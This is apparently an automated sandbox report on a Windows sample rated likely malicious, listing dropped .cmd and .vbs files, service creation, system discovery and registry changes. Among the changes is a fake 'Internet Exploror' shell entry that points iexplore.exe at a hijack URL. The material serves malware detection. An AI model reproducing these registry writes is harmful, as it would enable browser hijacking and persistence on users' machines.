Analysis Overview
SHA256
df8109601b236f59b077559a4db4ef7938f119d23fbbc75185974dfa1a030764
Threat Level: Likely malicious
The file 8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Creates new service(s)
Checks computer location settings
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
System Service Discovery
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Runs net.exe
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 08:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 08:26
Reported
2024-11-03 08:29
Platform
win7-20240903-en
Max time kernel
118s
Max time network
128s
Command Line
Signatures
Creates new service(s)
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\to.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\to.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Mail\UltraEdlt\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdlt\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Mail\UltraEdlt\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdlt\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
System Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc500000000002000000000010660000000100002000000089104b12bf2525b961d671977ef410c0a85ec573f22df8ec4aa4a53adca29427000000000e8000000002000020000000b82605beb8166ab835b48c1f59e26693b64efda809c5a7a44f6a7afb4c9e889720000000a52167cc58a32464206973d9b86dba6ffdd9405a3cc235779a93adff139780a34000000090b6ee9a4a500170a309cf7aeb65d95ca246ac215b6776724fa47285a9bf74190d721b07c7e7d9de3867f289e6df9a352cadac55a4a71f192976d79e84a92884 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000201b514c33397c3c4070c9e8b955e36965ec49196acfce249d8f8d8db8a15f3b000000000e800000000200002000000026112cded95900ba916098e08661a692ef02c47eba06ffbe2232bc580db9f6cc90000000c01787ddc5b36463d85727db7ace7aed79fa1dc9684265c0b2c294f77d9e52b372c27b38c5b7f59c42ed099c1a30a3f407398fb9504716a126fe5e17ba1208bea486166bd51c7ee84726aac2c43da41913abddbd5badc6be7024325e545b072288facb9f0acb59227305d67005cbcff1673c3aba9f178d6ffc4937abfb12c14c0a24768f0f0dfb3bd1027710ac9224d0400000001bd318a4c1f70e33f59fdc8e207e437786a09b68c3096cee82c696774733f897b70017f0d341c46490fa4d9d673d017add52808e391ef985d620d753f620a085 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436784274" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D6D46B1-99BD-11EF-B729-F2BBDB1F0DCB} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30900b37ca2ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
